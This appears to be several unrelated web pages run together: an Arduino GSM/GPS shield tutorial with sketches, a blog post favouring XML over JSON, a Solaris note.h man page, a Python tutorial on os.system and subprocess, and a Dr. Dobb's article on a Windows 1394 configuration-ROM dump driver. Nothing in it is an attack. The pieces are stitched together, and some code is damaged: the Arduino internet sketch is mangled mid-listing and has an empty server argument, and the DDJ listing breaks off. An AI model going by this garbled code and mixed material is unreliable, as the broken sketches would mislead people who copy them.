To use these functions simply instantiate the object in the sketch. The functions listed in the table below refers to an object created with the following command at the beginning of the sketch: CallGSM call; SMS.h For managing text messages must use this special class. As before, it is necessary to recall it within the sketch and then instantiate an object. For example, in the following functions refers to an object created at the beginning of the sketch, with the command SMSGSM sms; inetGSM.h In this class are included functions to connect and manage communications via HTTP protocol. In the following examples was an object created with the command InetGSM inet; EXAMPLE FOR CALLS AND SMS WITH THE GSM GPRS SHIELD Let us now, step by step, our first sketch to use the shield using the Arduino IDE version 1.00. We will write a program that when it receives a call from a preset number (stored in a specific location on the SIM), rejects the call and sends an SMS in response to the caller with the value read from an input. First you have to extract the files from the compressed folder within the Library folder libraries contained within the installation folder of Arduino. To first load the libraries using the following commands #include “SIM900.h” #include <SoftwareSerial.h> Then load, uncomment properly, the files related to classes containing functions that we want to use for the management of phone calls and SMS. #include “sms.h” #include “call.h” We will perform the initialization procedure in the setup. Set the pin to read the value which will then be sent via SMS, configure the serial communication and initialize the module with the function gsm.begin, and set the baud rate (usually for proper communication of data through GPRS is advisable not rise above 4800 baud). At this point we enter the heart of the program, which will periodically check the status of incoming calls. To do this within the cycle loop will use the function call.CallStatusWithAuth saving the byte returned. In the case of incoming or in progress call, the sender (or recipient) number is stored in the string number. Compared with the value stored CALL_INCOM_VOICE_AUTH, which describes an incoming call by a number in that set, we reject the call using the GSM.Hangup and after waiting 2 seconds, read the input value and send the message.The value read is an integer and must be first converted into a string using the function itoa. Let us remember to insert a delay, inside the loop function, to ensure that the module is interrogated at intervals of not less than a second. Commands sent in rapid sequence could corrupt the stability of the module. If we do not receive the result of proper initialization, you will need to check the power supply. Remember that it is recommended to use an external power source because the only power supplied by the USB port is not enought. If the power is found to be correct, you should check that the file GSM.cpp, in the library are declared properly pin for the serial. Basically the new version uses pins 2 and 3, while the old version used pins 4 and 5. #define _GSM_TXPIN_ 2 #define _GSM_RXPIN_ 3 The full program is as follows: #include "SIM900.h" #include <SoftwareSerial.h> //carichiamo i file necessari allo sketch #include "sms.h" #include "call.h" CallGSM call; SMSGSM sms; char number[20]; byte stat=0; int value=0; int pin=1; char value_str[5]; void setup() { pinMode(pin,INPUT); Serial.begin(9600); Serial.println("GSM GPRS Shield"); //init the module if (gsm.begin(2400)) Serial.println("\nstatus=READY"); else Serial.println("\nstatus=IDLE"); }; void loop() { stat=call.CallStatusWithAuth(number,1,3); if(stat==CALL_INCOM_VOICE_AUTH){ call.HangUp(); delay(2000); value=digitalRead(1); itoa(value,value_str,10); sms.SendSMS(number,value_str); } delay(1000); }; EXAMPLE FOR INTERNET We analyze one of the examples contained within the library to connect Arduino to the internet with GPRS connection. We will make a program capable of receiving HTML content from a web page and save the first 50 characters. Because we use only the functions relating to the Internet and HTTP, we load in addition to the standard library file, the file inetGSM.h Instantiate an object management functions InetGSM inet; and as before we execute the initialization routine. Then we establish a GPRS connection. In this step you need to run the command “AT+CIFSR” that requires the provider the IP address assigned to the GSM module. This step is important. Some providers garantee the connection only if previously it’s made this request. Through the function gsm.WhileSimpleRead contained in the GSM class, we read the entire contents of the buffer. Once emptied the buffer, the sketch will go to the following functions. At this point we are connected, we have to establish a TCP connection with the server, send a GET request to a web page and store the contents of the response in a previously declared array. All this is done by the function HttpGet in class inetGSM. In addition to the server and port (80 in the case of HTTP protocol), we have to indicate the path which contains the requested page.For example if you want to download the Wikipedia page on the Arduino to be reached at the following address it.wikipedia.org/wiki/Arduino_(hardware), the path will be /wiki/Arduino_ (hardware) while the server is it.wikipedia.org. numdata=inet.httpGET(“it.wikipedia.org “, 80, “/wiki/Arduino_(hardware) “, msg, 50); Obviously if we wish to save a greater number of characters of the answer, it is sufficient to initialize a string of larger dimensions, taking care not to saturate the RAM is made available by Arduino, otherwise we risk getting abnormal behavior, such as stalls or restarts. #include "SIM900.h" #include <SoftwareSerial.h> #include "inetGSM.h" InetGSM inet; char msg[50];); gsm.SimpleWriteln("AT+CIFSR"); delay(5000); gsm.WhileSimpleRead(); numdata=inet.httpGET("", 80, "/", msg, 50); Serial.println("\nNumero di byte ricevuti:"); Serial.println(numdata); Serial.println("\nData recived:"); Serial.println(msg); } }; void loop() { }; The shield has various connectors to accept more GSM/GPRS modules manufactured by SIMCOM and mounted on breakout board. In addition to the popular SIM900, our new shield for Arduino supports the recent SIM908, which is an evolution and aims to capture the market of GSM/GPRS quad-band providing a variety of additional features that make it unique, especially in the field of low-cost products. The SIM908 implements a GPS with 42 channels, characterized by an excellent accuracy and by a very reduced time required to perform the first fix (1 second in mode “hot start” and 30 seconds with the mode “cold start”). This module can be used powered by a lithium battery, and can charge it, greatly simplifying this process that would require dedicated hardware. The SIM908 has two serial, used one for the GSM and the other for the GPS. More exactly, the first serial interface is provided with a UART which belongs to the lines TXD, RXD, DTR, which go outside through the contacts, respectively, 12, 14, 10 of connector; for the GPS, instead, the serial is GPSTXD (contact 4) and GPSRXD (pin 5). The first serial port is actually intended for total control of SIM908, then it can also configure the GPS receiver and ask him to provide data on the location, the number of satellites hooked, etc. From the second serial port (GPSTXD / GPSRXD) instead, go out continuously strings in standard NMEA GPS system. THE GSM SHIELD LIBRARY Providing also use the SIM908, the library for the management of this module has been modified to provide a quick access to all the new features made available, the new library is derived from that used for the SIM900 module, and is available on the Internet at . Note that you can use the new library for managing mobile SIM900, provided you do not call functions dedicated to SIM908. While it is completely compatible using the sketch for the version without GPS with this new one. Let’s consider some new features introduced: first of all has been added the function ForceON(); used to check the status of the module and to force the power on. The SIM908 supports the charge of lithium batteries, the module can be started to perform the charger without the management of the GSM network. If we want to avoid this mode and make sure it’s really turned on then you need to call the function mentioned above. gsm.forceON(); Intended for the use of GPS (and battery), we made a class which you can instantiate an object with GPSGSM gps, after including its # include files “gps.h“, in order to invoke their functions by prefixing “GSM.” to the desired function. This subdivision into different files is designed to minimize RAM usage: in fact, for example, all the variables used by the class on the GPS will not be allocated in memory will not be included if the relevant files using #include “gps.h”.This allows you to choose which variables to use. As already mentioned, also for the management of the battery there ara functions which enable the measurement of the voltage and battery temperature; for practical reasons, occupying little memory, these have been included in the class of GPS. For use them, after including the file #include “gps.h” you must instantiate the object related with GPSGSM gps. In the next sections will show the control functions of the GPS and battery. HOW TO USE THE SIM908 GPS Before using GPS, you need to make a small set-up: first let’s make a bridge on jumper J1 on the SIM908 Breakout (cod. FT971). The bridge on J1 enables power to the GPS antenna. This serves to bring power to the active GPS antenna. Next, load the sketch example (in the examples directory) called GSM_GPRS_GPS_Library_AT (or even GSM_GPRSLibrary_AT) and once launched and completed initialization send the following commands: AT AT+CGPSPWR=1 AT+CGSPRST=0 We wait a minute, at which point the GPS should be working, to verify continue sending the command: AT+CGPSINF=0 If you can see the coordinates, it means that everything is working and we can proceed with the standard use by the implemented functions. Now we proceed with a simple example that allows us to understand how to get the coordinates from the GPS module SIM908 mounted on the shield, the firmware is described here: #include "SIM900.h" #include <SoftwareSerial.h> #include "gps.h" GPSGSM gps; char lon[10]; char lat[10]; char alt[10]; char time[15]; char vel[10]; char stat; boolean started=false; void setup() { //Serial connection. Serial.begin(9600); Serial.println("GSM GPRS GPS Shield"); if (gsm.begin(2400)){ Serial.println("\nstatus=READY"); gsm.forceON(); started=true; } else Serial.println("\nstatus=IDLE"); if(started){ if (gps.attachGPS()) Serial.println("status=GPSON"); else Serial.println("status=ERROR"); delay(20000); stat=gps.getStat(); if(stat==1) Serial.println("NOT FIXED"); else if(stat==0) Serial.println("GPS OFF"); else if(stat==2) Serial.println("2D FIXED"); else if(stat==3) Serial.println("3D FIXED"); delay(5000); gps.getPar(lon,lat,alt,time,vel); Serial.println(lon); Serial.println(lat); Serial.println(alt); Serial.println(time); Serial.println(vel); } }; void loop() { }; THE BATTERY In order to use the lithium battery as the power source for our FT971 module that houses the SIM908 (note: the SIM900 is not able to manage the barrery charge) is sufficient to close the bridge on this shield called with CHRG and set on VEXT the second bridge near the battery connector. Through the two library functions is possible to obtain the percentage of remaining charge, the battery voltage and the voltage read by the temperature sensor. In the case of applications poorly ventilated, with prolonged periods of work and in climatic conditions not exactly optimal, it is advisable to monitor this value to make sure that the battery works within the limits for a correct operation. The temperature can be calculated according to the relationship voltage/temperature sensor. It is also possible to set the module so that automatically determine if the battery is working outside the permissible range, with consequent shutdown of the same. To activate this mode, you need to send the command: AT+CMTE=1 To disable it you have to send the command: AT+CMTE=0 While to know which mode is configured must issue the command: AT+CMTE? To know the exact syntax of the functions and their return refer to Table: Also in this case we see how to implement these functions in a sketch, referring to this sketch, which contains the corresponding code. #include "SIM900.h" #include <SoftwareSerial.h> #include "inetGSM.h" #include "gps.h" GPSGSM gps; char perc[5]; char volt[6]; char tvolt[6]; long prevmillis=millis(); int interval=10000; void setup() { Serial.begin(9600); Serial.println("GSM GPRS GPS Shield."); if (gsm.begin(4800)){ Serial.println("\nstatus=READY"); gsm.forceON(); } else Serial.println("\nstatus=IDLE"); }; void loop() { if(millis()-prevmillis>interval){ gps.getBattInf(perc,volt); gps.getBattTVol(tvolt); Serial.print("Battery charge: "); Serial.print(perc); Serial.println("%"); Serial.print("Battery voltage: "); Serial.print(volt); Serial.println(" mV"); Serial.print("Temperature sensor voltage: "); Serial.print(tvolt); Serial.println(" mV"); Serial.println(""); prevmillis=millis(); } } DEBUG MODE GSM & GPS SHIELD During the use of the shield, sometimes you fail to get the desired results without understanding why, for help, libraries can be configured to provide output some debug messages during the execution of functions called. Inside the file GSM.h there is the following line: //#define DEBUG_ON Uncomment it, you are going to enable this mode, commenting, no diagnostic message will be shown on the serial output. HOW TO USE THE GSM & GPS SHIELD WITH ARDUINO MEGA For problems with the RAM, or simply for projects that require a larger number of input/output, we can use with the GSM/GPRS & GPS shield the Arduino Mega. Thanks to four serial port, we can use one of these instead of the serial software to communicate with the shield. With the latest release, the library can be used completely with Arduino Mega. You must open the file GSM.h and select the tab used appropriately commenting lines of code. Using the shield with Arduino Mega we comment as follows: //#define UNO #define MEGA If we want to use Arduino UNO: #define UNO //#define MEGA Similarly, also the file HWSerial.h, must be configured. As before, we see the first example for Arduino Mega: #define MEGA Using the file HWSerial.h is not necessary to define the possible use with Arduino Uno, as implemented in the class it is only used by the hardware serial. The library uses the serial Serial0 (TX 1 RX 0) for external communication and the serial Serial1 (RX 18 TX 19) to communicate with SIM900 and SIM908. Nothing prevents you replace every occurrence of Serial1 with Serial2 or one that you prefer. Please note that to use the serial hardware you need to create the connection between the shield and Arduino Mega using a bridge: the TX pin of the shield must be connected to TX1 18 and the RX pin with the RX1 19. THE STORE Pingback: Dan (freelancerace) | Pearltrees() Pingback: Jak zbudować telefon komórkowy ?() Pingback: How To Stop Rental Equipment Theft | SpyGearCo: Spy and Surveillance() Pingback: اصنع هاتفك الجوال بنفسك باستخدام اردوينو | آردوينو ببساطة Simply Arduino() Pingback: Using the GSM/GPRS & GPS Shield: call examples | Open Electronics() Pingback: Arduino GSM shield | Open Electronics() Pingback: m2m | Pearltrees() Pingback: GSM GPS shield for Arduino | How 2.0, Hobbies &...() Pingback: GPS Tracking | Pearltrees() Pingback: GSM GPS shield for Arduino | Arduino, Android, ...() Pingback: TiDiGino: remote control based on Arduino increases the performance | Open Electronics() Pingback: Fix Arduino Error Opening Serial Port Windows XP, Vista, 7, 8 [Solved]() Pingback: Gsm Gps | Garmin Approach()
http://www.open-electronics.org/gsm-gps-shield-for-arduino/
CC-MAIN-2016-30
en
refinedweb
JSON or XML? Which one is better? Which one is faster? Which one should I use in my next project? Stop it! These things are not comparable. It's similar to comparing a bicycle and an AMG S65. Seriously, which one is better? They both can take you from home to the office, right? In some cases, a bicycle will do it better. But does that mean they can be compared to each other? The same applies here with JSON and XML. They are very different things with their own areas of applicability. Here is how a simple JSON piece of data may look (140 characters): { "id": 123, "title": "Object Thinking", "author": "David West", "published": { "by": "Microsoft Press", "year": 2004 } } A similar document would look like this in XML (167 characters): <?xml version="1.0"?> <book id="123"> <title>Object Thinking</title> <author>David West</author> <published> <by>Microsoft Press</by> <year>2004</year> </published> </book> Looks easy to compare, right? The first example is a bit shorter, is easier to understand since it's less "cryptic," and is also perfectly parseable in JavaScript. That's it, then; let's use JSON and manifest the death of XML! Who needs this heavyweight 15-year-old XML in the first place? Well, I need it, and I love it. Let me explain why. And don't get me wrong; I'm not against JSON. Not at all. It's a good data format. But it's just a data format. We're using it temporarily to transfer a piece of data from point A to point B. Indeed, it is shorter than XML and more readable. That's it. XML is not a data format; it is a language. A very powerful one. Let me show you what it's capable of. Let me basically explain why I love it. And I would strongly recommend you read XML in a Nutshell, Third Edition by Elliotte Rusty Harold and W. Scott Means. I believe there are four features XML has that seriously set it apart from JSON or any other simple data format, like YAML for example. XPath. To get data like the year of publication from the document above, I just send an XPath query: /book/published/year/text(). However, there has to be an XPath processor that understands my request and returns 2004. The beauty of this is that XPath 2.0 is a very powerful query engine with its own functions, predicates, axes, etc. You can literally put any logic into your XPath request without writing any traversing logic in Java, for example. You may ask "How many books were published by David West in 2004?" and get an answer, just via XPath. JSON is not even close to this. Attributes and Namespaces. You can attach metadata to your data, just like it's done above with the idattribute. The data stays inside elements, just like the name of the book author, for example, while metadata (data about data) can and should be placed into attributes. This significantly helps in organizing and structuring information. On top of that, both elements and attributes can be marked as belonging to certain namespaces. This is a very useful technique during times when a few applications are working with the same XML document. XML Schema. When you create an XML document in one place, modify it a few times somewhere else, and then transfer it to yet another place, you want to make sure its structure is not broken by any of these actions. One of them may use <year>to store the publication date while another uses <date>with ISO-8601. To avoid that mess in structure, create a supplementary document, which is called XML Schema, and ship it together with the main document. Everyone who wants to work with the main document will first validate its correctness using the schema supplied. This is a sort of integration testing in production. RelaxNG is a similar but simpler mechanism; give it a try if you find XML Schema too complex. XSL. You can make modifications to your XML document without any Java/Ruby/etc. code at all. Just create an XSL transformation document and "apply" it to your original XML. As an output, you will get a new XML. The XSL language (it is purely functional, by the way) is designed for hierarchical data manipulations. It is much more suitable for this task than Java or any other OOP/procedural approach. You can transform an XML document into anything, including plain text and HTML. Some complain about XSL's complexity, but please give it a try. You won't need all of it, while its core functionality is pretty straight-forward. This is not a full list, but these four features really mean a lot to me. They give my document the ability to be "self-sufficient." It can validate itself (XML Schema), it knows how to modify itself (XSL), and it gives me very convenient access to anything inside it (XPath). There are many more languages, standards, and applications developed around XML, including XForms, SVG, MathML, RDF, OWL, WSDL, etc. But you are less likely to use them in a mainstream project, as they are rather "niche." JSON was not designed to have such features, even though some of them are now trying to find their places in the JSON world, including JSONPath for querying, some tools for transformations, and json-schema for validation. But they are just weak parodies compared to what XML offers, and I don't think they have any future. Or let's put it this way: I wish they would disappear sooner or later. They just turn a good, simple format into something clumsy. Thus, to conclude, JSON is a simple data format with no additional functionality. Its best-use case is AJAX. In all other cases, I strongly recommend you use XML.
http://www.yegor256.com/2015/11/16/json-vs-xml.html
CC-MAIN-2016-30
en
refinedweb
NAME | SYNOPSIS | DESCRIPTION | ATTRIBUTES | SEE ALSO #include <note.h>NOTE(NoteInfo); or #include<sys/note.h>_NOTE(NoteInfo); These macros are used to embed information for tools in program source. A use of one of these macros is called an “annotation”. A tool may define a set of such annotations which can then be used to provide the tool with information that would otherwise be unavailable from the source code. Annotations should, in general, provide documentation useful to the human reader. If information is of no use to a human trying to understand the code but is necessary for proper operation of a tool, use another mechanism for conveying that information to the tool (one which does not involve adding to the source code), so as not to detract from the readability of the source. The following is an example of an annotation which provides information of use to a tool and to the human reader (in this case, which data are protected by a particular lock, an annotation defined by the static lock analysis tool lock_lint). NOTE(MUTEX_PROTECTS_DATA(foo_lock, foo_list Foo)) Such annotations do not represent executable code; they are neither statements nor declarations. They should not be followed by a semicolon. If a compiler or tool that analyzes C source does not understand this annotation scheme, then the tool will ignore the annotations. (For such tools, NOTE(x) expands to nothing.) Annotations may only be placed at particular places in the source. These places are where the following C constructs would be allowed: a top-level declaration (that is, a declaration not within a function or other construct) a declaration or statement within a block (including the block which defines a function) a member of a struct or union. Annotations are not allowed in any other place. For example, the following are illegal: x = y + NOTE(...) z ; typedef NOTE(...) unsigned int uint ; While NOTE and _NOTE may be used in the places described above, a particular type of annotation may only be allowed in a subset of those places. For example, a particular annotation may not be allowed inside a struct or union definition. Ordinarily, NOTE should be used rather than _NOTE, since use of _NOTE technically makes a program non-portable. However, it may be inconvenient to use NOTE for this purpose in existing code if NOTE is already heavily used for another purpose. In this case one should use a different macro and write a header file similar to /usr/include/note.h which maps that macro to _NOTE in the same manner. For example, the following makes FOO such a macro: #ifndef _FOO_H #define _FOO_H #define FOO _NOTE #include <sys/note.h> #endif Public header files which span projects should use _NOTE rather than NOTE, since NOTE may already be used by a program which needs to include such a header file. The actual NoteInfo used in an annotation should be specified by a tool that deals with program source (see the documentation for the tool to determine which annotations, if any, it understands). NoteInfo must have one of the following forms: NoteName NoteName(Args) where NoteName is simply an identifier which indicates the type of annotation, and Args is something defined by the tool that specifies the particular NoteName. The general restrictions on Args are that it be compatible with an ANSI C tokenizer and that unquoted parentheses be balanced (so that the end of the annotation can be determined without intimate knowledge of any particular annotation). See attributes(5) for descriptions of the following attributes: NAME | SYNOPSIS | DESCRIPTION | ATTRIBUTES | SEE ALSO
http://docs.oracle.com/cd/E19683-01/816-5218/6mbcj7niu/index.html
CC-MAIN-2016-30
en
refinedweb
On Wed, 17 May 2006 11:51:52 +0200, Andersen wrote: > >Are all files on NFS stored on one central server? Or is is possible to >distribute the load on different servers? If so, which version supports >that? It's possible to distribute file systems across multiple NFS servers and use a namespace of some type. The most popular namespace is automounter but it could be any of the newer products as well; Acopia, Neoscale, Rainstorage, etc. An example is: /nfs/looks_like_one_fs/ But under that there are multiple directories that are each their own file system exported from seperate NFS servers but coalesced into one path structure by a namespace. Of course this usually means users will not be able to create anything under looks_like_one_fs directly but rather in the dir's below it. Hope this helps. ~F
http://fixunix.com/nfs/61930-nfs-distributed.html
CC-MAIN-2016-30
en
refinedweb
You can execute the command in a subshell using os.system(). This will call the Standard C function system(). This function will return the exit status of the process or command. This method is considered as old and not recommended, but presented here for historical reasons only. The subprocess module is recommended and it provides more powerful facilities for running command and retrieving their results. os.system example (deprecated) The syntax is: In this example, execute the date command: Sample outputs: Sat Nov 10 00:49:23 IST 2012 0 In this example, execute the date command using os.popen() and store its output to the variable called now: Sample outputs: Today is Sat Nov 10 00:49:23 IST 2012 Say hello to subprocess The os.system has many problems and subprocess is a much better way to executing unix command. The syntax is: In this example, execute the date command: Sample outputs: Sat Nov 10 00:59:42 IST 2012 0 You can pass the argument using the following syntax i.e run ls -l /etc/resolv.conf command: Sample outputs: <-rw-r--r-- 1 root root 157 Nov 7 15:06 /etc/resolv.conf 0 To store output to the output variable, run: Sample outputs: Today is Sat Nov 10 01:27:52 IST 2012 Another example (passing command line args): Sample outputs: *** Running ls -l command *** -rw-r--r-- 1 root root 157 Nov 7 15:06 /etc/resolv.conf In this example, run ping command and display back its output: The only problem with above code is that output, err = p.communicate() will block next statement till ping is completed i.e. you will not get real time output from the ping command. So you can use the following code to get real time output: Sample outputs: Related media A quick video demo of above python code: HTML 5 Video 01: Python Run External Command And Get Output On Screen or In Variable References: - Python 2.x: subprocess documentation. - Python 3.x: subprocess documentation. 307 ms? That’s a long interval ;) Hi, please more small and usefull examples with python like it! more code snippets! A very comprehensive explanation, being useful to beginners to python. where to find the command of linux these commands are very helpfull us….please give more example like this. Thanks! What exactly does Shell=True does? please tell the exact usage of the shell argumet. Hi, First off, enjoy all your posts and youtube videos. Recently viewed your tutorial on installing freebsd. So thank you for sharing your knowledge. I have a query regarding launching an external bash script file (.sh) in freebsd. For linux I used: os.system(‘sh ‘ + filepath) For Mac: os.system(‘open ‘ + filepath) And for windows: os.startfile(filepath) I am unable to get any of these to work for freebsd. I know startfile is only for windows, however was wondering if there was an equivalent for freebsd without using subprocess. Or if not possible at all how to use subprocess to call a external script. Also, in freebsd, what would be the equivalent of say: sudo chown -R user:user file.bundle as both sudo and chown are not installed by default. Any help would be appreciated. Regards, iSh0w tnxxxxxxx What if I want to create a variable in Python, then pass that variable to a bash command line? Something like this: …. celsius = sensor.read_temperature() import subprocess subprocess.call([“myscript.sh”, “-v”, “-t $celsius”]) Is that possible? Of course you can. In python’s new formatting it would look like this: subprocess.call(["myscript.sh", "-v", "-t {}".format(celsius)])
http://www.cyberciti.biz/faq/python-execute-unix-linux-command-examples/
CC-MAIN-2016-30
en
refinedweb
Bill is a senior software engineer at LSI Logic (formerly Symbios Logic). His current responsibilities include developing 1394 device drivers, software, and utilities. He can be contacted at .geocities.com/SiliconValley/Haven/4824. In the August, 1999, issue of DDJ, I wrote the article "An IEEE 1394 Configuration ROM Decoder." That article discussed how to read and decode the configuration ROM of 1394 peripherals on Windows 95 using the Texas Instruments TSBKPCI 1394 controller and the TI LynxSoft drivers. In this article, I'll present a new version of the DumpRom utility that runs on Windows 98 and Windows 2000. (The complete source code to this version of DumpRom is available electronically; see "Resource Center," page 5.) On Windows 98 and Windows 2000, Microsoft's 1394 architecture is much more complicated than that of TI's LynxSoft on Windows 95. Microsoft's architecture is based on the Windows Driver Model (WDM) and is a multilayered design. The most important layer in this design is 1394BUS.SYS, which is also known as the 1394 bus class driver. 1394BUS.SYS is responsible for presenting a unified, low-level interface to 1394. Underneath 1394BUS.SYS are the 1394 port drivers. These drivers are responsible for communicating directly to the various 1394 controllers. The port drivers shipped with Windows 98 include: - OHCI1394.SYS, port driver for the Open Host Controller Interface 1394 controllers. - TILYNX.SYS, port driver for the TI TSBKPCI and TSBKPCI403 1394 controllers. - AHA894X.SYS, port driver for the Adaptec AHA894X 1394 controllers. On top of 1394BUS.SYS are the higher level drivers that control different categories of peripherals connected to the 1394 bus. Those I am familiar with include: - SBP2.SYS, file system driver for the 1394 disk drives. - SONYDCAM.SYS, video driver for the Sony CCM-DS250 and TI MC680-DCC 1394 digital cameras. These high-level drivers, in turn, connect with various other subsystems. For example, SONYDCAM.SYS registers with the streaming drivers as a source of video. SBP2.SYS, on the other hand, registers with the SCSI subsystem to provide a source of file storage; see Figure 1. Windows 1394 API As far as I know, Microsoft has not published a 1394 API for applications to use directly. Luckily, the Windows 98 DDK provides the source to an application/driver combination that can be used to test and debug 1394 devices. These files are named Win1394.EXE and 1394Diag.SYS. Win1394.EXE is a Win32 application that communicates with the driver. 1394Diag .SYS is a WDM driver that registers with the system as the handler of diagnostic 1394 peripherals. A diagnostic peripheral is one that is plugged into the system when the 1394 port driver is in diagnostic mode. This is a special mode of the port driver that allows you to circumvent the normal binding of a device to higher level drivers. The binding of the device is then rerouted to a custom driver that is used to test and debug the device. Using the DDK source as a base, I ported the source code from the previous article into the new DumpRom.EXE utility. DumpRom .EXE uses the WDM driver DumpRomD .SYS to communicate with diagnostic 1394 peripherals. DumpRom Installation and Device Recognition Along with the source code to the WDM version of DumpRom, I have included a setup program that will install the source and executables. To install DumpRom, unzip WDUMPROM.ZIP onto a floppy disk. Then run SETUP.EXE from the floppy. SETUP will copy the files onto your hard drive and create task bar links to the DumpRom utility and documents. The default installation directory is C:\98ddk\ src\1394\DumpRom\. To install a diagnostic 1394 device, you must first launch DumpRom. From the task bar, select Start|Programs|Alexander|WDM Dump ROM|DumpRom. DumpRom will not automatically put the 1394 port driver into diagnostic mode. To do this, select 1394 Device|Find Device. The Find Device code puts the 1394 port driver into diagnostic mode. At this point, connecting a 1394 device will cause the bus class driver to detect a new diagnostic device and Windows will look for INF files that contain an entry for 1394\ 031887&040892 type devices. Windows will now prompt you for the location of the INF file. Inside of DumpRomD .INF, Windows will find the following entry under the Alexander manufacturer section: [Alexander] ; Generic Diagnostic Device %1394\031887&040892.DeviceDesc%=DumpRom,1394\031887&040892 This entry identifies DumpRomD.SYS as the handler of all 1394 diagnostic devices. All diagnostic devices are listed in the Windows 98 and Windows 2000 registry under the key HKLM\SYSTEM\CurrentControlSet\Enum\1394\031887&040892. Under this key, each diagnostic peripheral will have a subkey that is the byte-wise reversal of the device's global unique ID (GUID) stripped of leading zeros. For instance, my LSI SYM13FW500 1394-to-ATA/ATAPI bridge has the GUID 0x00A0B80000005009. So the subkey in the registry is 950000000B8A000. Next, Windows will locate the DumpRomD.SYS driver and copy it to the C:\Windows\System32\Drivers directory. DumpRomD.SYS is dynamically loadable and should now be servicing the device. If DumpRom cannot find the device, you'll need to bring up the Device Manager and try to delete and reinstall the device. If this does not work, try the Update Driver button and direct Windows to use DumpRomD.SYS. Dumping and Decoding the Configuration ROM Once the device has been found and DumpRomD.SYS has been loaded, you can now read the configuration ROM and display it by selecting 1394 Device|Dump Configuration ROM. As you can see in Listing One, the output is very much like that in the Windows 95 version of DumpRom. Disconnecting the Device After reading and decoding the configuration ROM, the only other option you have is to disconnect from the device. You can do this by selecting 1394 Device|Disconnect from Device. The disconnect code takes the 1394 port driver out of diagnostic mode and then prompts the user to physically disconnect the device from the 1394 bus. A word of caution here: A device will continue to look like a diagnostic device until the port driver is out of diagnostic mode and the device is disconnected from the bus. Just taking the port driver out of diagnostic mode is not good enough. Disconnecting the device forces the port driver to remove the device from its topology map. When the device is reconnected, it will be reenumerated as a normal device and will be bound to the driver that handles that device category. How the New Code Works Because this is a follow-up from a previous article, I will not discuss the decode algorithm. The issues that are of interest are as follows: - Placing the 1394 bus class driver into diagnostic mode. - Binding DumpRomD.SYS to a device. - Interfacing to DumpRomD.SYS. - Interfacing to 1394BUS.SYS. Before any device can be recognized as a diagnostic device, you must first select 1394 Device|Find Device to place the 1394 port driver, 1394BUS.SYS, into diagnostic mode. When this menu item is selected, DumpRom calls the Find1394Device() routine. Find1394Device() is a fairly simple routine that will prompt users to disconnect the target 1394 device, place the bus into diagnostic mode, prompt users to reconnect the device, and then confirm that there is a diagnostic device attached. To place the bus in diagnostic mode, Find1394Device() calls the DiagnoseAllAdapters() routine. Before discussing DiagnoseAllAdapters(), I must explain a little about 1394BUS.SYS. Because 1394BUS.SYS is a class driver, it can have multiple port drivers underneath it. As a result, the class driver actually looks like a collection of 1394 buses to the system and you must place each bus or port into diagnostic mode. Port is an unfortunate naming with 1394. In Windows, port means the 1394 port driver that is controlling a 1394 adapter. Do not confuse this with the physical 1394 ports on the adapter to which you connect peripherals. There are generally three physical ports on a 1394 adapter, but to Windows, all three of these physical ports are handled by only one port driver. To avoid confusion, I called my function DiagnoseAllAdapters() instead of DiagnoseAllPorts(). When DiagnoseAllAdapters() is called, it enters a loop that will open all 1394 buses and put them into diagnostic mode. To open the first 1394 bus, the loop uses the standard Win32 CreateFile() function with the symbolic device link name "\\\\.\\1394BUS0." For each iteration through the loop, this symbolic link name is incremented to open the next device. For example, the second 1394 bus has the name "\\\\.\\1394BUS1." Once a bus device is open, DiagoseAllAdapters() calls the Win32 DeviceIoControl() function with IO Control Code IOCTL_1394_TOGGLE_ ENUM_TEST_ON, which places the bus into diagnostic mode (see Listing Two). You will notice that DiagnoseAllAdapters() is also used to leave diagnostic mode. The bMode parameter indicates whether to enter or leave diagnostic mode. A value of True means to enter diagnostic mode, and False leaves diagnostic mode. In the case of False, the IO Control Code passed to DeviceIoControl() is IOCTL_1394_TOGGLE_ENUM_TEST_OFF. Once all 1394 buses are in diagnostic mode, any device plugged in at this point will appear as a diagnostic device. Initially, the system will not know about the new device because it has not been registered previously. The system will run the setup process that prompts users for the location of the INF and driver files and loads DumpRomD.SYS. To confirm that there is a device bound to DumpRomD.SYS, Find1394Device() next calls the ConfirmDeviceAttached() routine. ConfirmDeviceAttached() opens device "\\\\.\\DUMPROMD" and issues a GET_NODE_INFO IOCTL, which retrieves a list of devices that are bound to DumpRomD.SYS. The device list is built by a routine called DumpRomDGetDeviceInfo(), which lists all of the devices on every 1394 bus associated with DumpRomD. On return from DumpRomD, ConfirmDeviceAttached() selects one device from the list and returns to Find1394Devices() (see Listing Three). Once a device is found and selected, DumpRom calls DecodeConfigRom(), which reads the entire configuration ROM on the device one QUADLET at a time and places the image into a buffer. The old DumpRom program used a routine called ReadQuadlet() to read the configuration ROM image. This version of DumpRom employs the Win32 ReadFile() function with a buffer of four bytes to accomplish the same task. The ReadFile() call is translated to an IRP_MJ_READ IOCTL by the system, which then calls DumpRomDRead() inside of DumpRomD .SYS. In a nutshell (that is, excluding all of the IRP details), DumpRomDRead() builds an IRB (IO Request Block) structure with a function code of REQUEST_ ASYNC_READ and calls 1394BUS.SYS. 1394BUS transmits the 1394 QUADLET Read Request packet on the bus and receives a Read Response packet back from the device. The quadlet value is conveyed to DumpRomDRead(), which returns the value back to ReadConfigRom(); see Figure 2. The last thing that DumpRom does is decode the configuration ROM, which is achieved via the DecodeConfigRom() function. The source to DecodeConfigRom() did not change significantly from the old version of DumpRom. You can find a detailed description of DecodeConfigRom() in my August 1999 article. Conclusion The WDM version of DumpRom is much more complicated than its Windows 95 predecessor. The overall functionality is the same, but the additional driver module, DumpRomD.SYS, greatly increased the development time of the code. Also, hooking the device driver into the system by placing the bus class driver into diagnostic mode added to this level of complexity. Complexity aside, once the driver is installed properly, DumpRom works quite well. It also serves as a convenient tool to debug your configuration ROM under Windows 98 and Windows 2000. Because DumpRom can be dynamically hooked and unhooked from the system, you can decode the configuration ROM of your device and then reconnect the device to continue normal operation without rebooting the system. References Alexander, William F. "IEEE 1394 Configuration ROM Decoder," DDJ, August 1999. ISO/IEC 13212: 1994(E) ANSI/IEEE Std 1212, 1994 Edition, pp. 79-100. IEEE Standard for a High Performance Serial Bus, IEEE Std 1394-1995, August 30, 1996. Microsoft Windows 2000 DDK, Beta 2, 1998. Microsoft Windows 98 DDK, 1998. Microsoft Developer Network Library, April 1999. DDJ Listing One Device \\.\1394BUS0 in diagnostic mode Found 1 devices on \\.\DUMPROMD Device List: Name = DumpRomD000, Port = 0000, Bus = 03FF, Node = 0000 Selected device: index=0,Name=\\.\DumpRomD000,Port=0000,Bus=03FF,Node=0000 Raw Data Dump of the Configuration ROM 